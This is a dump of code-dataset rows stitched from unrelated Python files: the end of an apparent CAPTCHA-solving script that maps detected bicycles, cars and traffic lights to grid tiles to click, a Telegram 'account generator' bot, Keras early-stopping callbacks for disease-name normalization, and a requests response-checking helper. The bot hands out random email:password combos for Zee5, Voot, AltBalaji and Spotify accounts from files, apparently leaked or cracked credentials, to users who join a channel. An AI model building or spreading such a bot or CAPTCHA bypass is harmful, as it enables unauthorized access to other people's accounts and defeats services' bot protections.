y1 = boxes[a][1]
y1_box = box_path_y1(y1)
y2 = boxes[a][3] + y1
y2_box = box_path_y2(y2)
x1y1 = box_corner(x=x1_box, y=y1_box)
x1y1_n = ""
for n in x1y1:
if n != "G":
x1y1_n += n
x2y1 = box_corner(x=x2_box, y=y1_box)
x2y1_n = ""
for n in x2y1:
if n != "G":
x2y1_n += n
x1y2 = box_corner(x=x1_box, y=y2_box)
x1y2_n = ""
for n in x1y2:
if n != "G":
x1y2_n += n
x2y2 = box_corner(x=x2_box, y=y2_box)
x2y2_n = ""
for n in x2y2:
if n != "G":
x2y2_n += n
x1y1_n = int(x1y1_n)
x2y1_n = int(x2y1_n)
x1y2_n = int(x1y2_n)
x2y2_n = int(x2y2_n)
if class_ids[a] == 1:
class_ids[a] = "Bicycle"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_bicycle:
box_bicycle.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_bicycle:
box_bicycle.append(click_box[i])
if class_ids[a] == 2:
class_ids[a] = "Car"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_car:
box_car.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_car:
box_car.append(click_box[i])
if class_ids[a] == 3:
class_ids[a] = "Motorcycle"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_motorcycle:
box_motorcycle.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_motorcycle:
box_motorcycle.append(click_box[i])
if class_ids[a] == 5:
class_ids[a] = "Bus"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_bus:
box_bus.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_bus:
box_bus.append(click_box[i])
if class_ids[a] == 8:
class_ids[a] = "Boat"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_boat:
box_boat.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_boat:
box_boat.append(click_box[i])
if class_ids[a] == 9:
class_ids[a] = "Traffic Light"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_traffic_light:
box_traffic_light.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_traffic_light:
box_traffic_light.append(click_box[i])
if class_ids[a] == 12:
class_ids[a] = "Parking meter"
if x1y1 == x2y1 and x1y1 == x1y2 and x1y1 == x2y2:
click_box = [x1y1]
if click_box[0] not in box_parking_meter:
box_parking_meter.append(click_box[0])
else :
row_1 = []
row_2 = []
for top_line in range((x2y1_n-x1y1_n)+1):
row_1.append(x1y1_n + top_line)
for bottom_line in range((x2y2_n-x1y2_n)+1):
row_2.append(x1y2_n + bottom_line)
click_box = []
for i in range(len(row_1)):
click_box.append(row_1[i])
while row_1[i] < row_2[i]:
row_1[i] = row_1[i] + 3
click_box.append(row_1[i])
for i in range(len(click_box)):
click_box[i] = str("G") + str(click_box[i])
if click_box[i] not in box_parking_meter:
box_parking_meter.append(click_box[i])
################################################################################################
print("\n")
print("Bicycle => ", box_bicycle)
print("Car => ", box_car)
print("Motorcycle => ", box_motorcycle)
print("Bus => ", box_bus)
print("Boat => ", box_boat)
print("Traffic light => ", box_traffic_light)
print("Fire hydrant => ", box_fire_hydrant)
print("Parking meter => ", box_parking_meter)
| 33.172932 | 97 | 0.414665 | 3,260 | 26,472 | 3.129755 | 0.054908 | 0.131726 | 0.034304 | 0.030187 | 0.822013 | 0.816525 | 0.805155 | 0.755072 | 0.755072 | 0.755072 | 0 | 0.082415 | 0.458673 | 26,472 | 797 | 98 | 33.214555 | 0.629449 | 0.004382 | 0 | 0.809598 | 0 | 0 | 0.026102 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.01548 | false | 0 | 0.009288 | 0 | 0.106811 | 0.020124 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
| 96988eae4c95c47ea17ffecb54903d94ca1585dd | 3,405 | py | Python | AccGenBot/plugins/acc.py | infotechbro/AccGenBot | ae87ed9d88aa7e11177e794417c6a7391b842b4e | ["MIT"] | 8 | 2021-04-24T03:27:07.000Z | 2021-10-07T04:09:22.000Z | AccGenBot/plugins/acc.py | infotechbro/AccGenBot | ae87ed9d88aa7e11177e794417c6a7391b842b4e | ["MIT"] | null | null | null | AccGenBot/plugins/acc.py | infotechbro/AccGenBot | ae87ed9d88aa7e11177e794417c6a7391b842b4e | ["MIT"] | 12 | 2021-04-24T05:16:56.000Z | 2022-03-16T13:48:39.000Z |
from AccGenBot import AccGen
from AccGenBot.verify import verify
from telethon import events, Button
import random
from Configs import Config
@AccGen.on(events.callbackquery.CallbackQuery(data="zee5"))
async def zee5(event):
check = await verify(Config.CHANNEL_US, event, AccGen)
if check is False:
await event.reply("**Join my channel to use me:)**", buttons=[
[Button.url("Join Channel", "{}".format(Config.CHANNEL_URL))]
])
return
with open('zee5.txt') as k:
hits = k.read().splitlines()
combo = random.choice(hits)
email, password = combo.split(":")
TEXT = f"""
<b>Generated Zee5 Acc</b>
<b>Combo:</b> <code>{email}:{password}</code>
<b>Email:</b> <code>{email}</code>
<b>Password:</b> <code>{password}</code>
<b>Generated By: @{event.sender.username}</b>
<b>User-ID: {event.sender_id}</b>
"""
await event.edit(TEXT, parse_mode="HTML", buttons=[[Button.inline("Back", data="gen")]
])
@AccGen.on(events.callbackquery.CallbackQuery(data="voot"))
async def voot(event):
check = await verify(Config.CHANNEL_US, event, AccGen)
if check is False:
await event.reply("**Join my channel to use me:)**", buttons=[
[Button.url("Join Channel", "{}".format(Config.CHANNEL_URL))]
        ])
        return
with open('voot.txt') as k:
hits = k.read().splitlines()
combo = random.choice(hits)
email, password = combo.split(":")
TEXT = f"""
<b>Generated Voot Acc</b>
<b>Combo:</b> <code>{email}:{password}</code>
<b>Email:</b> <code>{email}</code>
<b>Password:</b> <code>{password}</code>
<b>Generated By: @{event.sender.username}</b>
<b>User-ID: {event.sender_id}</b>
"""
await event.edit(TEXT, parse_mode="HTML", buttons=[[Button.inline("Back", data="gen")]
])
@AccGen.on(events.callbackquery.CallbackQuery(data="alt"))
async def alt(event):
check = await verify(Config.CHANNEL_US, event, AccGen)
if check is False:
await event.reply("**Join my channel to use me:)**", buttons=[
[Button.url("Join Channel", "{}".format(Config.CHANNEL_URL))]
])
return
with open('alt.txt') as k:
hits = k.read().splitlines()
combo = random.choice(hits)
email, password = combo.split(":")
TEXT = f"""
<b>Generated AltBalaji Acc</b>
<b>Combo:</b> <code>{email}:{password}</code>
<b>Email:</b> <code>{email}</code>
<b>Password:</b> <code>{password}</code>
<b>Generated By: @{event.sender.username}</b>
<b>User-ID: {event.sender_id}</b>
"""
await event.edit(TEXT, parse_mode="HTML", buttons=[[Button.inline("Back", data="gen")]
])
@AccGen.on(events.callbackquery.CallbackQuery(data="sp"))
async def sp(event):
check = await verify(Config.CHANNEL_US, event, AccGen)
if check is False:
await event.reply("**Join my channel to use me:)**", buttons=[
[Button.url("Join Channel", "{}".format(Config.CHANNEL_URL))]
])
return
with open('sp.txt') as k:
hits = k.read().splitlines()
combo = random.choice(hits)
email, password = combo.split(":")
TEXT = f"""
<b>Generated Spotify Acc</b>
<b>Combo:</b> <code>{email}:{password}</code>
<b>Email:</b> <code>{email}</code>
<b>Password:</b> <code>{password}</code>
<b>Generated By: @{event.sender.username}</b>
<b>User-ID: {event.sender_id}</b>
"""
await event.edit(TEXT, parse_mode="HTML", buttons=[[Button.inline("Back", data="gen")]
])
| 31.238532 | 90 | 0.628488 | 471 | 3,405 | 4.509554 | 0.150743 | 0.028249 | 0.037665 | 0.050847 | 0.904896 | 0.904896 | 0.884181 | 0.884181 | 0.884181 | 0.884181 | 0 | 0.001762 | 0.16652 | 3,405 | 108 | 91 | 31.527778 | 0.746653 | 0 | 0 | 0.793478 | 0 | 0 | 0.351836 | 0.120999 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.130435 | 0.054348 | 0 | 0.086957 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 8 |
| 73cae440862856f0f4ae47bceb45542017a1b799 | 17,346 | py | Python | src/callback.py | fshdnc/disease_normalization | 68b8fc118fe0f971fbd056ad2bffb44caa0e7abf | ["Apache-2.0"] | 1 | 2021-01-28T09:24:27.000Z | 2021-01-28T09:24:27.000Z | src/callback.py | fshdnc/disease_normalization | 68b8fc118fe0f971fbd056ad2bffb44caa0e7abf | ["Apache-2.0"] | 1 | 2019-07-08T03:25:30.000Z | 2019-12-13T08:33:55.000Z | src/callback.py | fshdnc/disease_normalization | 68b8fc118fe0f971fbd056ad2bffb44caa0e7abf | ["Apache-2.0"] | null | null | null |
#!/usr/bin/env python3
# coding: utf8
"""
A ranking accuracy callback.
Modified from: https://github.com/lfurrer/disease-normalization/blob/master/tzlink/rank/callback.py
"""
import numpy as np
import logging
logger = logging.getLogger(__name__)
from keras.callbacks import Callback
from keras.models import load_model
from datetime import datetime
import io
import model_tools
from cnn import semantic_similarity_layer
def save_model(model, path,now):
logger.info('Saving best model to {0}'.format(path+now))
model_name = path + now + '.json'
weights_name = path + now + '.h5'
model_tools.save_model(model, model_name, weights_name)
def evaluate(data_mentions, predictions, data_y):
'''
Input:
data_mentions: e.g. val_data.mentions, of the form [(start,end,untok_mention),(),...,()]
predictions: [[prob],[prob],...,[prob]]
data_y: e.g. val_data.y, of the form [[0],[1],...,[0]]
'''
assert len(predictions) == len(data_y)
correct = 0
logger.warning('High chance of same prediction scores.')
for start, end, untok_mention in data_mentions:
index_prediction = np.argmax(predictions[start:end],axis=0)
# print(index_prediction) # prediction same for first few epochs
if data_y[start:end][index_prediction] == 1:
correct += 1
total = len(data_mentions)
accuracy = correct/total
logger.info('Accuracy: {0}, Correct: {1}, Total: {2}'.format(accuracy,correct,total))
return accuracy
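# A hedged worked example of evaluate() (synthetic numbers, not part of the
# module): one mention whose candidates occupy rows 0..2, with the gold
# candidate scoring highest.
# mentions = [(0, 3, 'diabetes')]
# predictions = np.array([[0.1], [0.7], [0.2]])
# y = np.array([[0], [1], [0]])
# evaluate(mentions, predictions, y)  # -> 1.0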
def write_training_info(conf,path):
import configparser
with open(path,'w',encoding='utf-8') as configfile: # save
conf.write(configfile)
class Timed(Callback):
'''
Calculates time taken.
'''
def __init__(self):
super().__init__()
self.before = None
self.after = None
def on_epoch_begin(self,epoch,logs={}):
self.before = datetime.now()
def on_epoch_end(self, epoch,logs={}):
self.after = datetime.now()
logger.info('Time taken for the epoch:{0}'.format(self.after-self.before))
class EarlyStoppingRankingAccuracy(Callback):
''' Ranking accuracy callback with early stopping.
'''
def __init__(self, conf, val_data):
super().__init__()
self.conf = conf
self.val_data = val_data
self.best = 0 # best accuracy
self.wait = 0
self.stopped_epoch = 0
self.model_path = conf['model']['path_model_whole']
self.save = int(self.conf['settings']['save_prediction'])
self.now = datetime.now().strftime('%Y%m%d-%H%M%S')
self.history = self.conf['settings']['history'] + self.now + '.txt'
write_training_info(self.conf,self.history)
def on_train_begin(self, logs={}):
self.losses = []
self.accuracy = []
self.wait = 0
with open(self.history,'a',encoding='utf-8') as fh:
# Pass the file handle in as a lambda function to make it callable
self.model.summary(print_fn=lambda x: fh.write(x + '\n'))
return
def on_epoch_end(self, epoch, logs={}):
self.losses.append(logs.get('loss'))
#before = datetime.now()
test_y = self.model.predict(self.val_data.x)
#after = datetime.now()
#logger.info('Time taken for prediction without speedup:{0}'.format(after-before))
evaluation_parameter = evaluate(self.val_data.mentions, test_y, self.val_data.y)
self.accuracy.append(evaluation_parameter)
with open(self.history,'a',encoding='utf-8') as f:
f.write('Epoch: {0}, Training loss: {1}, validation accuracy: {2}\n'.format(epoch,logs.get('loss'),evaluation_parameter))
if evaluation_parameter > self.best:
logging.info('Intermediate model saved.')
self.best = evaluation_parameter
self.model.save(self.model_path)
self.wait = 0
# something here to print trec_eval doc
else:
self.wait += 1
if self.wait > int(self.conf['training']['patience']):
self.stopped_epoch = epoch
self.model.stop_training = True
if self.save and self.model.stop_training:
logger.info('Saving predictions to {0}'.format(self.conf['model']['path_saved_predictions']))
model_tools.save_predictions(self.conf['model']['path_saved_predictions'],test_y) #(filename,predictions)
logger.info('Testing: epoch: {0}, self.model.stop_training: {1}'.format(epoch+1,self.model.stop_training))
return
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
logging.info('Epoch %05d: early stopping', self.stopped_epoch + 1)
if self.conf.getint('model','save'):
self.model = load_model(self.model_path,custom_objects={'semantic_similarity_layer': semantic_similarity_layer})
save_model(self.model, self.conf['model']['path'],self.now)
return
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
return
class EarlyStoppingRankingAccuracySpedUp(Callback):
''' Ranking accuracy callback with early stopping.
'''
def __init__(self, conf, val_data, concept_padded, corpus_padded,pretrained):
super().__init__()
self.conf = conf
self.val_data = val_data
self.concept_padded = concept_padded
self.corpus_padded = corpus_padded
self.pretrained = pretrained
self.convoluted_input = None
self.prediction_model = None
self.best = 0 # best accuracy
self.wait = 0
self.stopped_epoch = 0
self.model_path = conf['model']['path_model_whole']
self.save = int(self.conf['settings']['save_prediction'])
self.now = datetime.now().strftime('%Y%m%d-%H%M%S')
self.history = self.conf['settings']['history'] + self.now + '.txt'
write_training_info(self.conf,self.history)
def on_train_begin(self, logs={}):
self.losses = []
self.accuracy = []
self.wait = 0
with open(self.history,'a',encoding='utf-8') as fh:
# Pass the file handle in as a lambda function to make it callable
self.model.summary(print_fn=lambda x: fh.write(x + '\n'))
return
def on_epoch_end(self, epoch, logs={}):
self.losses.append(logs.get('loss'))
from cnn import forward_pass_speedup
before = datetime.now()
self.convoluted_input, self.prediction_model = forward_pass_speedup(self.model,self.corpus_padded,self.concept_padded,self.pretrained)
test_y = self.prediction_model.predict(self.convoluted_input)
after = datetime.now()
logger.info('Time taken for prediction with speedup:{0}'.format(after-before))
evaluation_parameter = evaluate(self.val_data.mentions, test_y, self.val_data.y)
self.accuracy.append(evaluation_parameter)
self.convoluted_input = None
self.prediction_model = None
with open(self.history,'a',encoding='utf-8') as f:
f.write('Epoch: {0}, Training loss: {1}, validation accuracy: {2}\n'.format(epoch,logs.get('loss'),evaluation_parameter))
if evaluation_parameter > self.best:
logging.info('Intermediate model saved.')
self.best = evaluation_parameter
self.model.save(self.model_path)
self.wait = 0
# something here to print trec_eval doc
else:
self.wait += 1
if self.wait > int(self.conf['training']['patience']):
self.stopped_epoch = epoch
self.model.stop_training = True
if self.save and self.model.stop_training:
logger.info('Saving predictions to {0}'.format(self.conf['model']['path_saved_predictions']))
model_tools.save_predictions(self.conf['model']['path_saved_predictions'],test_y) #(filename,predictions)
logger.info('Testing: epoch: {0}, self.model.stop_training: {1}'.format(epoch,self.model.stop_training))
return
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
logging.info('Epoch %05d: early stopping', self.stopped_epoch + 1)
if self.conf.getint('model','save'):
self.model = load_model(self.model_path,custom_objects={'semantic_similarity_layer': semantic_similarity_layer})
save_model(self.model, self.conf['model']['path'],self.now)
return
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
return
class EarlyStoppingRankingAccuracySpedUpSharedEncoder(Callback):
''' Ranking accuracy callback with early stopping.
'''
def __init__(self, conf, val_data, concept_padded, corpus_padded, pretrained):
super().__init__()
self.conf = conf
self.val_data = val_data
self.concept_padded = concept_padded
self.corpus_padded = corpus_padded
self.pretrained = pretrained
self.convoluted_input = None
self.prediction_model = None
self.best = 0 # best accuracy
self.wait = 0
self.stopped_epoch = 0
self.model_path = conf['model']['path_model_whole']
self.save = int(self.conf['settings']['save_prediction'])
self.now = datetime.now().strftime('%Y%m%d-%H%M%S')
self.history = self.conf['settings']['history'] + self.now + '.txt'
write_training_info(self.conf,self.history)
def on_train_begin(self, logs={}):
self.losses = []
self.accuracy = []
self.wait = 0
with open(self.history,'a',encoding='utf-8') as fh:
# Pass the file handle in as a lambda function to make it callable
self.model.summary(print_fn=lambda x: fh.write(x + '\n'))
return
def on_epoch_end(self, epoch, logs={}):
self.losses.append(logs.get('loss'))
from cnn import forward_pass_speedup_shared_encoder
before = datetime.now()
self.convoluted_input, self.prediction_model = forward_pass_speedup_shared_encoder(self.model,self.corpus_padded,self.concept_padded,self.pretrained)
test_y = self.prediction_model.predict(self.convoluted_input)
after = datetime.now()
logger.info('Time taken for prediction with speedup:{0}'.format(after-before))
evaluation_parameter = evaluate(self.val_data.mentions, test_y, self.val_data.y)
self.accuracy.append(evaluation_parameter)
self.convoluted_input = None
self.prediction_model = None
with open(self.history,'a',encoding='utf-8') as f:
f.write('Epoch: {0}, Training loss: {1}, validation accuracy: {2}\n'.format(epoch,logs.get('loss'),evaluation_parameter))
if evaluation_parameter > self.best:
logging.info('Intermediate model saved.')
self.best = evaluation_parameter
self.model.save(self.model_path)
self.wait = 0
# something here to print trec_eval doc
else:
self.wait += 1
if self.wait > int(self.conf['training']['patience']):
self.stopped_epoch = epoch
self.model.stop_training = True
if self.save and self.model.stop_training:
logger.info('Saving predictions to {0}'.format(self.conf['model']['path_saved_predictions']))
model_tools.save_predictions(self.conf['model']['path_saved_predictions'],test_y) #(filename,predictions)
logger.info('Testing: epoch: {0}, self.model.stop_training: {1}'.format(epoch,self.model.stop_training))
return
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
logging.info('Epoch %05d: early stopping', self.stopped_epoch + 1)
if self.conf.getint('model','save'):
self.model.load_weights(self.model_path)
save_model(self.model, self.conf['model']['path'],self.now)
return
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
return
class EarlyStoppingRankingAccuracySpedUpGiveModel(Callback):
''' Ranking accuracy callback with early stopping.
'''
def __init__(self, conf, val_data, concept_padded, corpus_padded, pretrained, create_spedup_model):
super().__init__()
self.conf = conf
self.val_data = val_data
self.concept_padded = concept_padded
self.corpus_padded = corpus_padded
self.pretrained = pretrained
self.convoluted_input = None
self.prediction_model = None
self.create_spedup_model = create_spedup_model
self.best = 0 # best accuracy
self.wait = 0
self.stopped_epoch = 0
self.model_path = conf['model']['path_model_whole']
self.save = int(self.conf['settings']['save_prediction'])
self.now = datetime.now().strftime('%Y%m%d-%H%M%S')
self.history = self.conf['settings']['history'] + self.now + '.txt'
write_training_info(self.conf,self.history)
def on_train_begin(self, logs={}):
self.losses = []
self.accuracy = []
self.wait = 0
with open(self.history,'a',encoding='utf-8') as fh:
# Pass the file handle in as a lambda function to make it callable
self.model.summary(print_fn=lambda x: fh.write(x + '\n'))
return
def on_epoch_end(self, epoch, logs={}):
self.losses.append(logs.get('loss'))
before = datetime.now()
self.convoluted_input, self.prediction_model = self.create_spedup_model(self.model,self.corpus_padded,self.concept_padded,self.pretrained)
test_y = self.prediction_model.predict(self.convoluted_input)
after = datetime.now()
logger.debug('Time taken for prediction with speedup:{0}'.format(after-before))
evaluation_parameter = evaluate(self.val_data.mentions, test_y, self.val_data.y)
self.accuracy.append(evaluation_parameter)
self.convoluted_input = None
self.prediction_model = None
with open(self.history,'a',encoding='utf-8') as f:
f.write('Epoch: {0}, Training loss: {1}, validation accuracy: {2}\n'.format(epoch,logs.get('loss'),evaluation_parameter))
if evaluation_parameter > self.best:
logging.info('Intermediate model saved.')
self.best = evaluation_parameter
self.model.save(self.model_path)
self.wait = 0
# something here to print trec_eval doc
else:
self.wait += 1
if self.wait > int(self.conf['training']['patience']):
self.stopped_epoch = epoch
self.model.stop_training = True
if self.save and self.model.stop_training:
logger.info('Saving predictions to {0}'.format(self.conf['model']['path_saved_predictions']))
model_tools.save_predictions(self.conf['model']['path_saved_predictions'],test_y) #(filename,predictions)
logger.info('Testing: epoch: {0}, self.model.stop_training: {1}'.format(epoch,self.model.stop_training))
return
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
logging.info('Epoch %05d: early stopping', self.stopped_epoch + 1)
try:
self.model.load_weights(self.model_path)
except OSError:
pass
# function in run_generator
# predict(self.conf, self.concept, self.positives, self.vocab, self.entity_model, self.concept_model,self.model, self.val_data, result=self.history)
if self.conf.getint('model','save'):
save_model(self.model, self.conf['model']['path'],self.now)
return
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
return
class EarlyStoppingRankingAccuracyGenerator(Callback):
''' Ranking accuracy callback with early stopping.
'''
def __init__(self, conf, concept, positives, vocab, entity_model, concept_model, original_model,val_data):
super().__init__()
self.conf = conf
self.concept = concept
self.positives = positives
self.vocab = vocab
self.entity_model = entity_model
self.concept_model = concept_model
self.original_model = original_model
self.val_data = val_data
self.best = 0 # best accuracy
self.wait = 0
self.stopped_epoch = 0
self.patience = int(conf['training']['patience'])
self.model_path = conf['model']['path_model_whole']
self.save = int(self.conf['settings']['save_prediction'])
self.now = datetime.now().strftime('%Y%m%d-%H%M%S')
self.history = self.conf['settings']['history'] + self.now + '.txt'
write_training_info(self.conf,self.history)
def on_train_begin(self, logs={}):
self.losses = []
self.accuracy = []
self.wait = 0
with open(self.history,'a',encoding='utf-8') as fh:
# Pass the file handle in as a lambda function to make it callable
self.original_model.summary(print_fn=lambda x: fh.write(x + '\n'))
return
def on_epoch_end(self, epoch, logs={}):
self.losses.append(logs.get('loss'))
evaluation_parameter = predict(self.conf, self.concept, self.positives, self.vocab, self.entity_model, self.concept_model,self.model, self.val_data)
self.accuracy.append(evaluation_parameter)
with open(self.history,'a',encoding='utf-8') as f:
f.write('Epoch: {0}, Training loss: {1}, validation accuracy: {2}\n'.format(epoch,logs.get('loss'),evaluation_parameter))
if evaluation_parameter > self.best:
logging.info('Intermediate model saved.')
self.best = evaluation_parameter
self.model.save(self.model_path)
self.wait = 0
# something here to print trec_eval doc
else:
self.wait += 1
        if self.wait > self.patience:
self.stopped_epoch = epoch
self.model.stop_training = True
        if self.save and self.model.stop_training:
            # `predict` above only returns the accuracy, so no prediction
            # array is available to save in this callback.
            logger.warning('save_prediction is set, but this callback does not retain raw predictions; skipping save.')
logger.info('Testing: epoch: {0}, self.model.stop_training: {1}'.format(epoch,self.model.stop_training))
return
def on_train_end(self, logs=None):
if self.stopped_epoch > 0:
logging.info('Epoch %05d: early stopping', self.stopped_epoch + 1)
try:
self.model.load_weights(self.model_path)
except OSError:
pass
# function in run_generator
# predict(self.conf, self.concept, self.positives, self.vocab, self.entity_model, self.concept_model,self.model, self.val_data, result=self.history)
if self.conf.getint('model','save'):
save_model(self.model, self.conf['model']['path'],self.now)
return
def on_batch_end(self, batch, logs={}):
self.losses.append(logs.get('loss'))
return
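# A hedged wiring sketch (not part of the module): assumes `conf` is a
# configparser object with the sections read in __init__ above and that
# val_data exposes .x, .y and .mentions in the format evaluate() expects;
# train_x/train_y/epochs are illustrative names.
def fit_with_ranking_early_stopping(model, train_x, train_y, conf, val_data, epochs=50):
    ranking_cb = EarlyStoppingRankingAccuracy(conf, val_data)
    model.fit(train_x, train_y, epochs=epochs, callbacks=[ranking_cb, Timed()])
    return ranking_cb.accuracy  # per-epoch validation accuracies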
| 37.626898 | 156 | 0.708232 | 2,452 | 17,346 | 4.840946 | 0.084421 | 0.046251 | 0.026959 | 0.035383 | 0.849031 | 0.842965 | 0.842965 | 0.841281 | 0.832856 | 0.825611 | 0 | 0.007534 | 0.150582 | 17,346 | 461 | 157 | 37.626898 | 0.798086 | 0.109074 | 0 | 0.816092 | 0 | 0 | 0.143256 | 0.025663 | 0 | 0 | 0 | 0 | 0.002874 | 1 | 0.08908 | false | 0.017241 | 0.031609 | 0 | 0.198276 | 0.014368 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
| 73fd5a05bd62856a766308103b3feb3d66e495ac | 2,710 | py | Python | little_finger/utils/requests_response_util.py | yromeMfOtuO/little-finger | 6474366e6f8f9072584aa7f113a7f425544a7708 | ["Apache-2.0"] | null | null | null | little_finger/utils/requests_response_util.py | yromeMfOtuO/little-finger | 6474366e6f8f9072584aa7f113a7f425544a7708 | ["Apache-2.0"] | null | null | null | little_finger/utils/requests_response_util.py | yromeMfOtuO/little-finger | 6474366e6f8f9072584aa7f113a7f425544a7708 | ["Apache-2.0"] | null | null | null |
"""
requests response处理,校验状态码及成功标志
默认response content-type 为 json
"""
import requests
def check_status(response: requests.Response, err_msg: str = None):
"""
check http response status is 200
:param response: requests http response
:param err_msg: exception error message
"""
if not str(response.status_code).startswith("2"):
if not err_msg:
err_msg = f"response status code: {response.status_code}, response content: {response.content}"
raise Exception(err_msg)
def check_flag(response: requests.Response, flag: str = 'success', err_msg: str = None):
"""
check http response status is 200, and check the business success flag
:param response: requests http response
:param flag: business flag key
:param err_msg: exception error message
"""
check_status(response, err_msg)
if not response.json()[flag]:
if not err_msg:
err_msg = f"business code is not success, response content: {response.content}"
raise Exception(err_msg)
def check_export(response: requests.Response, err_msg: str = None, data_key: str = None):
"""
check http response status is 200, and export response json
:param response: requests http response
:param err_msg: exception error message
:param data_key: data field key in json
:return: json
"""
check_status(response, err_msg)
return response.json() if not data_key else response.json()[data_key]
def check_export_data(response: requests.Response, err_msg: str = None):
"""
check http response status is 200, and export response json
:param response: requests http response
:param err_msg: exception error message
:return: json
"""
return check_export(response, err_msg, 'data')
def check_flag_export(response: requests.Response, flag: str = 'success', err_msg: str = None, data_key: str = None):
"""
check http response status is 200, and check the business success flag, then export response json
:param response: requests http response
:param flag: business flag key
:param err_msg: exception error message
:param data_key: data field key in json
"""
check_flag(response, flag, err_msg)
return response.json() if not data_key else response.json()[data_key]
def check_flag_export_data(response: requests.Response, flag: str = 'success', err_msg: str = None):
"""
check http response status is 200, and check the business success flag, then export response json
:param response: requests http response
:param flag: business flag key
:param err_msg: exception error message
"""
return check_flag_export(response, flag, err_msg, "data")
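# A hedged usage sketch (not part of the module), assuming an endpoint that
# answers with {"success": true, "data": {...}}:
def fetch_data(url: str):
    """GET an endpoint and unwrap its data field, raising if the status or
    business-flag checks above fail."""
    resp = requests.get(url)
    return check_flag_export_data(resp)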
